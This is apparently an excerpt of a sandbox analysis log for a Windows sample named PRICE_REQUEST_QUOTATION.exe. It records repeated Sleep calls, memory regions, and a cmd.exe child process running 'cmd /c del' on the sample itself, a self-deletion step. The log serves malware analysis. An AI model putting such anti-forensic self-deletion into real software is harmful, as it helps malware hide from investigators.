[0179.235] Sleep (dwMilliseconds=0x7d0) [0179.243] Sleep (dwMilliseconds=0x7d0) [0179.245] Sleep (dwMilliseconds=0x7d0) [0179.255] Sleep (dwMilliseconds=0x7d0) [0179.265] Sleep (dwMilliseconds=0x7d0) [0179.266] Sleep (dwMilliseconds=0x7d0) [0179.275] Sleep (dwMilliseconds=0x7d0) [0179.276] Sleep (dwMilliseconds=0x7d0) [0179.287] Sleep (dwMilliseconds=0x7d0) [0179.297] Sleep (dwMilliseconds=0x7d0) [0179.298] Sleep (dwMilliseconds=0x7d0) [0179.308] Sleep (dwMilliseconds=0x7d0) [0179.309] Sleep (dwMilliseconds=0x7d0) [0179.316] Sleep (dwMilliseconds=0x7d0) [0179.319] Sleep (dwMilliseconds=0x7d0) [0179.320] Sleep (dwMilliseconds=0x7d0) [0179.334] Sleep (dwMilliseconds=0x7d0) [0179.336] Sleep (dwMilliseconds=0x7d0) [0179.360] Sleep (dwMilliseconds=0x7d0) [0179.537] Sleep (dwMilliseconds=0x7d0) [0179.548] Sleep (dwMilliseconds=0x7d0) [0179.550] Sleep (dwMilliseconds=0x7d0) [0179.592] Sleep (dwMilliseconds=0x7d0) [0179.594] Sleep (dwMilliseconds=0x7d0) [0179.603] Sleep (dwMilliseconds=0x7d0) [0179.604] Sleep (dwMilliseconds=0x7d0) [0179.606] Sleep (dwMilliseconds=0x7d0) [0179.615] Sleep (dwMilliseconds=0x7d0) [0179.616] Sleep (dwMilliseconds=0x7d0) [0179.624] Sleep (dwMilliseconds=0x7d0) [0179.626] Sleep (dwMilliseconds=0x7d0) [0179.636] Sleep (dwMilliseconds=0x7d0) [0179.637] Sleep (dwMilliseconds=0x7d0) [0179.646] Sleep (dwMilliseconds=0x7d0) [0179.648] Sleep (dwMilliseconds=0x7d0) [0179.656] Sleep (dwMilliseconds=0x7d0) [0179.657] Sleep (dwMilliseconds=0x7d0) [0179.666] Sleep (dwMilliseconds=0x7d0) [0179.668] Sleep (dwMilliseconds=0x7d0) [0179.678] Sleep (dwMilliseconds=0x7d0) [0179.679] Sleep (dwMilliseconds=0x7d0) [0179.688] Sleep (dwMilliseconds=0x7d0) [0179.690] Sleep (dwMilliseconds=0x7d0) [0179.703] Sleep (dwMilliseconds=0x7d0) [0179.705] Sleep (dwMilliseconds=0x7d0) [0179.718] Sleep (dwMilliseconds=0x7d0) [0179.743] Sleep (dwMilliseconds=0x7d0) [0179.754] Sleep (dwMilliseconds=0x7d0) [0179.759] Sleep (dwMilliseconds=0x7d0) [0179.773] Sleep (dwMilliseconds=0x7d0) [0179.785] Sleep (dwMilliseconds=0x7d0) [0179.786] Sleep (dwMilliseconds=0x7d0) [0179.790] Sleep (dwMilliseconds=0x7d0) [0179.798] Sleep (dwMilliseconds=0x7d0) [0179.810] Sleep (dwMilliseconds=0x7d0) [0179.824] Sleep (dwMilliseconds=0x7d0) [0179.826] Sleep (dwMilliseconds=0x7d0) [0179.830] Sleep (dwMilliseconds=0x7d0) [0179.848] Sleep (dwMilliseconds=0x7d0) [0179.850] Sleep (dwMilliseconds=0x7d0) [0179.865] Sleep (dwMilliseconds=0x7d0) [0179.881] Sleep (dwMilliseconds=0x7d0) [0179.893] Sleep (dwMilliseconds=0x7d0) [0179.909] Sleep (dwMilliseconds=0x7d0) [0179.911] Sleep (dwMilliseconds=0x7d0) [0179.923] Sleep (dwMilliseconds=0x7d0) [0179.925] Sleep (dwMilliseconds=0x7d0) [0179.928] Sleep (dwMilliseconds=0x7d0) [0179.939] Sleep (dwMilliseconds=0x7d0) [0179.941] Sleep (dwMilliseconds=0x7d0) [0179.952] Sleep (dwMilliseconds=0x7d0) [0179.955] Sleep (dwMilliseconds=0x7d0) [0179.966] Sleep (dwMilliseconds=0x7d0) [0179.969] Sleep (dwMilliseconds=0x7d0) [0179.981] Sleep (dwMilliseconds=0x7d0) [0179.994] Sleep (dwMilliseconds=0x7d0) [0179.996] Sleep (dwMilliseconds=0x7d0) [0180.009] Sleep (dwMilliseconds=0x7d0) [0180.010] Sleep (dwMilliseconds=0x7d0) [0180.012] Sleep (dwMilliseconds=0x7d0) [0180.022] Sleep (dwMilliseconds=0x7d0) [0180.114] Sleep (dwMilliseconds=0x7d0) [0180.125] Sleep (dwMilliseconds=0x7d0) [0180.135] Sleep (dwMilliseconds=0x7d0) [0180.136] Sleep (dwMilliseconds=0x7d0) [0180.142] Sleep (dwMilliseconds=0x7d0) [0180.144] Sleep (dwMilliseconds=0x7d0) [0180.145] Sleep (dwMilliseconds=0x7d0) [0180.154] Sleep (dwMilliseconds=0x7d0) [0180.156] Sleep (dwMilliseconds=0x7d0) [0180.165] Sleep (dwMilliseconds=0x7d0) [0180.166] Sleep (dwMilliseconds=0x7d0) [0180.175] Sleep (dwMilliseconds=0x7d0) [0180.182] Sleep (dwMilliseconds=0x7d0) [0180.189] Sleep (dwMilliseconds=0x7d0) [0180.192] Sleep (dwMilliseconds=0x7d0) [0180.193] Sleep (dwMilliseconds=0x7d0) [0180.203] Sleep (dwMilliseconds=0x7d0) [0180.205] Sleep (dwMilliseconds=0x7d0) [0180.215] Sleep (dwMilliseconds=0x7d0) [0180.225] Sleep (dwMilliseconds=0x7d0) [0180.230] Sleep (dwMilliseconds=0x7d0) [0180.236] Sleep (dwMilliseconds=0x7d0) [0180.237] Sleep (dwMilliseconds=0x7d0) [0180.250] Sleep (dwMilliseconds=0x7d0) [0180.251] Sleep (dwMilliseconds=0x7d0) [0180.262] Sleep (dwMilliseconds=0x7d0) [0180.263] Sleep (dwMilliseconds=0x7d0) [0180.273] Sleep (dwMilliseconds=0x7d0) [0180.275] Sleep (dwMilliseconds=0x7d0) [0180.288] Sleep (dwMilliseconds=0x7d0) [0180.299] Sleep (dwMilliseconds=0x7d0) [0180.309] Sleep (dwMilliseconds=0x7d0) [0180.314] Sleep (dwMilliseconds=0x7d0) [0180.319] Sleep (dwMilliseconds=0x7d0) [0180.320] Sleep (dwMilliseconds=0x7d0) [0180.330] Sleep (dwMilliseconds=0x7d0) [0180.342] Sleep (dwMilliseconds=0x7d0) [0180.343] Sleep (dwMilliseconds=0x7d0) [0180.351] Sleep (dwMilliseconds=0x7d0) [0180.352] Sleep (dwMilliseconds=0x7d0) [0180.355] Sleep (dwMilliseconds=0x7d0) [0180.362] Sleep (dwMilliseconds=0x7d0) [0180.411] Sleep (dwMilliseconds=0x7d0) [0180.413] Sleep (dwMilliseconds=0x7d0) [0180.421] Sleep (dwMilliseconds=0x7d0) [0180.422] Sleep (dwMilliseconds=0x7d0) [0180.433] Sleep (dwMilliseconds=0x7d0) [0180.434] Sleep (dwMilliseconds=0x7d0) [0180.444] Sleep (dwMilliseconds=0x7d0) [0180.512] Sleep (dwMilliseconds=0x7d0) [0180.521] Sleep (dwMilliseconds=0x7d0) [0180.530] Sleep (dwMilliseconds=0x7d0) [0180.531] Sleep (dwMilliseconds=0x7d0) [0180.542] Sleep (dwMilliseconds=0x7d0) [0180.543] Sleep (dwMilliseconds=0x7d0) [0180.551] Sleep (dwMilliseconds=0x7d0) [0180.552] Sleep (dwMilliseconds=0x7d0) [0180.562] Sleep (dwMilliseconds=0x7d0) [0180.563] Sleep (dwMilliseconds=0x7d0) [0180.572] Sleep (dwMilliseconds=0x7d0) [0180.574] Sleep (dwMilliseconds=0x7d0) [0180.582] Sleep (dwMilliseconds=0x7d0) [0180.583] Sleep (dwMilliseconds=0x7d0) [0180.592] Sleep (dwMilliseconds=0x7d0) [0180.602] Sleep (dwMilliseconds=0x7d0) [0180.605] Sleep (dwMilliseconds=0x7d0) [0180.613] Sleep (dwMilliseconds=0x7d0) [0180.622] Sleep (dwMilliseconds=0x7d0) [0180.624] Sleep (dwMilliseconds=0x7d0) [0180.634] Sleep (dwMilliseconds=0x7d0) [0180.636] Sleep (dwMilliseconds=0x7d0) [0180.646] Sleep (dwMilliseconds=0x7d0) [0180.659] Sleep (dwMilliseconds=0x7d0) [0180.660] Sleep (dwMilliseconds=0x7d0) [0180.663] Sleep (dwMilliseconds=0x7d0) [0180.674] Sleep (dwMilliseconds=0x7d0) [0180.675] Sleep (dwMilliseconds=0x7d0) [0180.688] Sleep (dwMilliseconds=0x7d0) [0180.692] Sleep (dwMilliseconds=0x7d0) [0180.706] Sleep (dwMilliseconds=0x7d0) [0180.719] Sleep (dwMilliseconds=0x7d0) [0180.720] Sleep (dwMilliseconds=0x7d0) [0180.731] Sleep (dwMilliseconds=0x7d0) [0180.732] Sleep (dwMilliseconds=0x7d0) [0180.744] Sleep (dwMilliseconds=0x7d0) [0180.745] Sleep (dwMilliseconds=0x7d0) [0180.747] Sleep (dwMilliseconds=0x7d0) [0180.770] Sleep (dwMilliseconds=0x7d0) [0180.771] Sleep (dwMilliseconds=0x7d0) [0180.787] Sleep (dwMilliseconds=0x7d0) [0180.790] Sleep (dwMilliseconds=0x7d0) [0180.797] Sleep (dwMilliseconds=0x7d0) [0180.803] Sleep (dwMilliseconds=0x7d0) [0180.804] Sleep (dwMilliseconds=0x7d0) [0180.819] Sleep (dwMilliseconds=0x7d0) [0180.821] Sleep (dwMilliseconds=0x7d0) [0180.853] Sleep (dwMilliseconds=0x7d0) [0180.854] Sleep (dwMilliseconds=0x7d0) [0180.860] Sleep (dwMilliseconds=0x7d0) [0180.868] Sleep (dwMilliseconds=0x7d0) [0180.870] Sleep (dwMilliseconds=0x7d0) [0180.885] Sleep (dwMilliseconds=0x7d0) [0180.888] Sleep (dwMilliseconds=0x7d0) [0180.900] Sleep (dwMilliseconds=0x7d0) [0180.901] Sleep (dwMilliseconds=0x7d0) [0180.916] Sleep (dwMilliseconds=0x7d0) [0180.917] Sleep (dwMilliseconds=0x7d0) [0180.930] Sleep (dwMilliseconds=0x7d0) [0180.932] Sleep (dwMilliseconds=0x7d0) [0180.941] Sleep (dwMilliseconds=0x7d0) [0180.943] Sleep (dwMilliseconds=0x7d0) [0180.945] Sleep (dwMilliseconds=0x7d0) [0180.957] Sleep (dwMilliseconds=0x7d0) [0180.958] Sleep (dwMilliseconds=0x7d0) [0180.971] Sleep (dwMilliseconds=0x7d0) [0180.975] Sleep (dwMilliseconds=0x7d0) [0180.984] Sleep (dwMilliseconds=0x7d0) [0180.987] Sleep (dwMilliseconds=0x7d0) [0181.000] Sleep (dwMilliseconds=0x7d0) [0181.001] Sleep (dwMilliseconds=0x7d0) [0181.015] Sleep (dwMilliseconds=0x7d0) [0181.017] Sleep (dwMilliseconds=0x7d0) [0181.024] Sleep (dwMilliseconds=0x7d0) [0181.030] Sleep (dwMilliseconds=0x7d0) [0181.044] Sleep (dwMilliseconds=0x7d0) [0181.045] Sleep (dwMilliseconds=0x7d0) [0181.058] Sleep (dwMilliseconds=0x7d0) [0181.059] Sleep (dwMilliseconds=0x7d0) [0181.066] Sleep (dwMilliseconds=0x7d0) [0181.071] Sleep (dwMilliseconds=0x7d0) [0181.073] Sleep (dwMilliseconds=0x7d0) [0181.085] Sleep (dwMilliseconds=0x7d0) [0181.087] Sleep (dwMilliseconds=0x7d0) [0181.103] Sleep (dwMilliseconds=0x7d0) [0181.105] Sleep (dwMilliseconds=0x7d0) [0181.109] Sleep (dwMilliseconds=0x7d0) [0181.116] Sleep (dwMilliseconds=0x7d0) [0181.118] Sleep (dwMilliseconds=0x7d0) [0181.129] Sleep (dwMilliseconds=0x7d0) [0181.142] Sleep (dwMilliseconds=0x7d0) [0181.143] Sleep (dwMilliseconds=0x7d0) [0181.149] Sleep (dwMilliseconds=0x7d0) [0181.152] Sleep (dwMilliseconds=0x7d0) [0181.154] Sleep (dwMilliseconds=0x7d0) [0181.164] Sleep (dwMilliseconds=0x7d0) [0181.175] Sleep (dwMilliseconds=0x7d0) [0181.176] Sleep (dwMilliseconds=0x7d0) [0181.184] Sleep (dwMilliseconds=0x7d0) [0181.186] Sleep (dwMilliseconds=0x7d0) [0181.190] Sleep (dwMilliseconds=0x7d0) [0181.196] Sleep (dwMilliseconds=0x7d0) [0181.209] Sleep (dwMilliseconds=0x7d0) [0181.218] Sleep (dwMilliseconds=0x7d0) [0181.219] Sleep (dwMilliseconds=0x7d0) [0181.229] Sleep (dwMilliseconds=0x7d0) [0181.231] Sleep (dwMilliseconds=0x7d0) [0181.242] Sleep (dwMilliseconds=0x7d0) [0181.243] Sleep (dwMilliseconds=0x7d0) [0181.255] Sleep (dwMilliseconds=0x7d0) [0181.266] Sleep (dwMilliseconds=0x7d0) [0181.272] Sleep (dwMilliseconds=0x7d0) [0181.277] Sleep (dwMilliseconds=0x7d0) [0181.279] Sleep (dwMilliseconds=0x7d0) [0181.288] Sleep (dwMilliseconds=0x7d0) [0181.293] Sleep (dwMilliseconds=0x7d0) [0181.303] Sleep (dwMilliseconds=0x7d0) [0181.304] Sleep (dwMilliseconds=0x7d0) [0181.315] Sleep (dwMilliseconds=0x7d0) [0181.319] Sleep (dwMilliseconds=0x7d0) [0181.350] Sleep (dwMilliseconds=0x7d0) [0181.360] Sleep (dwMilliseconds=0x7d0) [0181.371] Sleep (dwMilliseconds=0x7d0) [0181.384] Sleep (dwMilliseconds=0x7d0) [0181.386] Sleep (dwMilliseconds=0x7d0) [0181.387] Sleep (dwMilliseconds=0x7d0) [0181.396] Sleep (dwMilliseconds=0x7d0) [0181.397] Sleep (dwMilliseconds=0x7d0) [0181.406] Sleep (dwMilliseconds=0x7d0) [0181.408] Sleep (dwMilliseconds=0x7d0) [0181.432] Sleep (dwMilliseconds=0x7d0) [0181.516] Sleep (dwMilliseconds=0x7d0) [0181.519] Sleep (dwMilliseconds=0x7d0) [0181.524] Sleep (dwMilliseconds=0x7d0) [0181.540] Sleep (dwMilliseconds=0x7d0) [0181.542] Sleep (dwMilliseconds=0x7d0) [0181.557] Sleep (dwMilliseconds=0x7d0) [0181.559] Sleep (dwMilliseconds=0x7d0) [0181.566] Sleep (dwMilliseconds=0x7d0) [0181.572] Sleep (dwMilliseconds=0x7d0) [0181.573] Sleep (dwMilliseconds=0x7d0) [0181.587] Sleep (dwMilliseconds=0x7d0) [0181.588] Sleep (dwMilliseconds=0x7d0) [0181.600] Sleep (dwMilliseconds=0x7d0) [0181.602] Sleep (dwMilliseconds=0x7d0) [0181.609] Sleep (dwMilliseconds=0x7d0) [0181.616] Sleep (dwMilliseconds=0x7d0) [0181.617] Sleep (dwMilliseconds=0x7d0) [0181.631] Sleep (dwMilliseconds=0x7d0) [0181.645] Sleep (dwMilliseconds=0x7d0) [0181.646] Sleep (dwMilliseconds=0x7d0) [0181.655] Sleep (dwMilliseconds=0x7d0) [0181.662] Sleep (dwMilliseconds=0x7d0) [0181.677] Sleep (dwMilliseconds=0x7d0) [0181.691] Sleep (dwMilliseconds=0x7d0) [0181.692] Sleep (dwMilliseconds=0x7d0) [0181.698] Sleep (dwMilliseconds=0x7d0) [0181.705] Sleep (dwMilliseconds=0x7d0) [0181.706] Sleep (dwMilliseconds=0x7d0) [0181.719] Sleep (dwMilliseconds=0x7d0) [0181.721] Sleep (dwMilliseconds=0x7d0) [0181.735] Sleep (dwMilliseconds=0x7d0) [0181.736] Sleep (dwMilliseconds=0x7d0) [0181.741] Sleep (dwMilliseconds=0x7d0) [0181.752] Sleep (dwMilliseconds=0x7d0) [0181.766] Sleep (dwMilliseconds=0x7d0) [0181.785] Sleep (dwMilliseconds=0x7d0) [0181.793] Sleep (dwMilliseconds=0x7d0) [0181.805] Sleep (dwMilliseconds=0x7d0) [0181.807] Sleep (dwMilliseconds=0x7d0) [0181.822] Sleep (dwMilliseconds=0x7d0) [0181.823] Sleep (dwMilliseconds=0x7d0) [0181.836] Sleep (dwMilliseconds=0x7d0) [0181.851] Sleep (dwMilliseconds=0x7d0) [0181.865] Sleep (dwMilliseconds=0x7d0) [0181.867] Sleep (dwMilliseconds=0x7d0) [0181.879] Sleep (dwMilliseconds=0x7d0) [0181.881] Sleep (dwMilliseconds=0x7d0) [0181.890] Sleep (dwMilliseconds=0x7d0) [0181.895] Sleep (dwMilliseconds=0x7d0) [0181.907] Sleep (dwMilliseconds=0x7d0) [0181.908] Sleep (dwMilliseconds=0x7d0) [0181.924] Sleep (dwMilliseconds=0x7d0) [0181.925] Sleep (dwMilliseconds=0x7d0) [0181.932] Sleep (dwMilliseconds=0x7d0) [0181.939] Sleep (dwMilliseconds=0x7d0) [0181.953] Sleep (dwMilliseconds=0x7d0) [0181.954] Sleep (dwMilliseconds=0x7d0) [0181.967] Sleep (dwMilliseconds=0x7d0) [0181.968] Sleep (dwMilliseconds=0x7d0) [0181.972] Sleep (dwMilliseconds=0x7d0) [0181.982] Sleep (dwMilliseconds=0x7d0) [0181.984] Sleep (dwMilliseconds=0x7d0) [0181.996] Sleep (dwMilliseconds=0x7d0) [0182.009] Sleep (dwMilliseconds=0x7d0) [0182.012] Sleep (dwMilliseconds=0x7d0) [0182.025] Sleep (dwMilliseconds=0x7d0) [0182.026] Sleep (dwMilliseconds=0x7d0) [0182.038] Sleep (dwMilliseconds=0x7d0) [0182.054] Sleep (dwMilliseconds=0x7d0) [0182.055] Sleep (dwMilliseconds=0x7d0) [0182.076] Sleep (dwMilliseconds=0x7d0) [0182.078] Sleep (dwMilliseconds=0x7d0) [0182.093] Sleep (dwMilliseconds=0x7d0) [0182.102] Sleep (dwMilliseconds=0x7d0) [0182.109] Sleep (dwMilliseconds=0x7d0) [0182.113] Sleep (dwMilliseconds=0x7d0) [0182.129] Sleep (dwMilliseconds=0x7d0) [0182.130] Sleep (dwMilliseconds=0x7d0) [0182.142] Sleep (dwMilliseconds=0x7d0) [0182.143] Sleep (dwMilliseconds=0x7d0) [0182.146] Sleep (dwMilliseconds=0x7d0) [0182.157] Sleep (dwMilliseconds=0x7d0) [0182.171] Sleep (dwMilliseconds=0x7d0) [0182.173] Sleep (dwMilliseconds=0x7d0) [0182.186] Sleep (dwMilliseconds=0x7d0) [0182.187] Sleep (dwMilliseconds=0x7d0) [0182.203] Sleep (dwMilliseconds=0x7d0) [0182.205] Sleep (dwMilliseconds=0x7d0) [0182.219] Sleep (dwMilliseconds=0x7d0) [0182.229] Sleep (dwMilliseconds=0x7d0) [0182.233] Sleep (dwMilliseconds=0x7d0) [0182.247] Sleep (dwMilliseconds=0x7d0) [0182.248] Sleep (dwMilliseconds=0x7d0) [0182.262] Sleep (dwMilliseconds=0x7d0) [0182.264] Sleep (dwMilliseconds=0x7d0) [0182.272] Sleep (dwMilliseconds=0x7d0) [0182.278] Sleep (dwMilliseconds=0x7d0) [0182.293] Sleep (dwMilliseconds=0x7d0) [0182.295] Sleep (dwMilliseconds=0x7d0) [0182.309] Sleep (dwMilliseconds=0x7d0) [0182.314] Sleep (dwMilliseconds=0x7d0) [0182.321] Sleep (dwMilliseconds=0x7d0) [0182.322] Sleep (dwMilliseconds=0x7d0) [0182.331] Sleep (dwMilliseconds=0x7d0) [0182.333] Sleep (dwMilliseconds=0x7d0) [0182.342] Sleep (dwMilliseconds=0x7d0) [0182.351] Sleep (dwMilliseconds=0x7d0) [0182.352] Sleep (dwMilliseconds=0x7d0) [0182.356] Sleep (dwMilliseconds=0x7d0) [0182.362] Sleep (dwMilliseconds=0x7d0) [0182.363] Sleep (dwMilliseconds=0x7d0) [0182.372] Sleep (dwMilliseconds=0x7d0) [0182.378] Sleep (dwMilliseconds=0x7d0) [0182.391] Sleep (dwMilliseconds=0x7d0) [0182.393] Sleep (dwMilliseconds=0x7d0) [0182.400] Sleep (dwMilliseconds=0x7d0) [0182.402] Sleep (dwMilliseconds=0x7d0) [0182.403] Sleep (dwMilliseconds=0x7d0) [0182.412] Sleep (dwMilliseconds=0x7d0) [0182.413] Sleep (dwMilliseconds=0x7d0) [0182.423] Sleep (dwMilliseconds=0x7d0) [0182.434] Sleep (dwMilliseconds=0x7d0) [0182.435] Sleep (dwMilliseconds=0x7d0) [0182.441] Sleep (dwMilliseconds=0x7d0) [0182.445] Sleep (dwMilliseconds=0x7d0) [0182.508] Sleep (dwMilliseconds=0x7d0) [0182.535] Sleep (dwMilliseconds=0x7d0) [0182.544] Sleep (dwMilliseconds=0x7d0) [0182.555] Sleep (dwMilliseconds=0x7d0) [0182.556] Sleep (dwMilliseconds=0x7d0) [0182.561] Sleep (dwMilliseconds=0x7d0) [0182.566] Sleep (dwMilliseconds=0x7d0) [0182.567] Sleep (dwMilliseconds=0x7d0) [0182.578] Sleep (dwMilliseconds=0x7d0) [0182.591] Sleep (dwMilliseconds=0x7d0) [0182.592] Sleep (dwMilliseconds=0x7d0) [0182.603] Sleep (dwMilliseconds=0x7d0) [0182.606] Sleep (dwMilliseconds=0x7d0) [0182.607] Sleep (dwMilliseconds=0x7d0) [0182.864] Sleep (dwMilliseconds=0x7d0) [0184.543] Sleep (dwMilliseconds=0x7d0) [0184.577] Sleep (dwMilliseconds=0x7d0) [0184.658] Sleep (dwMilliseconds=0x7d0) [0184.893] Sleep (dwMilliseconds=0x7d0) [0184.972] Sleep (dwMilliseconds=0x7d0) [0184.975] Sleep (dwMilliseconds=0x7d0) [0185.024] Sleep (dwMilliseconds=0x7d0) [0185.036] Sleep (dwMilliseconds=0x7d0) [0185.079] Sleep (dwMilliseconds=0x7d0) [0185.093] Sleep (dwMilliseconds=0x7d0) [0185.098] Sleep (dwMilliseconds=0x7d0) [0185.112] Sleep (dwMilliseconds=0x7d0) [0185.157] Sleep (dwMilliseconds=0x7d0) [0185.172] Sleep (dwMilliseconds=0x7d0) [0185.247] Sleep (dwMilliseconds=0x7d0) [0185.266] Sleep (dwMilliseconds=0x7d0) [0185.279] Sleep (dwMilliseconds=0x7d0) [0185.479] Sleep (dwMilliseconds=0x7d0) Thread: id = 64 os_tid = 0xd0c Thread: id = 65 os_tid = 0xb38 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1677b000" os_pid = "0x9a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x3f8" cmd_line = "/c del \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 947 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 948 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 949 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 950 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 951 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 952 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 953 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 954 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 955 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 956 start_va = 0xb80000 end_va = 0xbd1fff monitored = 1 entry_point = 0xb94fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 957 start_va = 0xbe0000 end_va = 0x4bdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 958 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 959 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 960 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 961 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 962 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 963 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 964 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 965 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 966 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 967 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 968 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 969 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 970 start_va = 0x460000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 971 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 972 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 973 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 974 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1039 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1040 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1041 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1042 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1043 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1044 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1045 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1046 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 57 os_tid = 0x188 [0123.373] GetModuleHandleA (lpModuleName=0x0) returned 0xb80000 [0123.373] __set_app_type (_Type=0x1) [0123.373] __p__fmode () returned 0x74344d6c [0123.373] __p__commode () returned 0x74345b1c [0123.373] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb95200) returned 0x0 [0123.373] __getmainargs (in: _Argc=0xba60e8, _Argv=0xba60ec, _Env=0xba60f0, _DoWildCard=0, _StartInfo=0xba60fc | out: 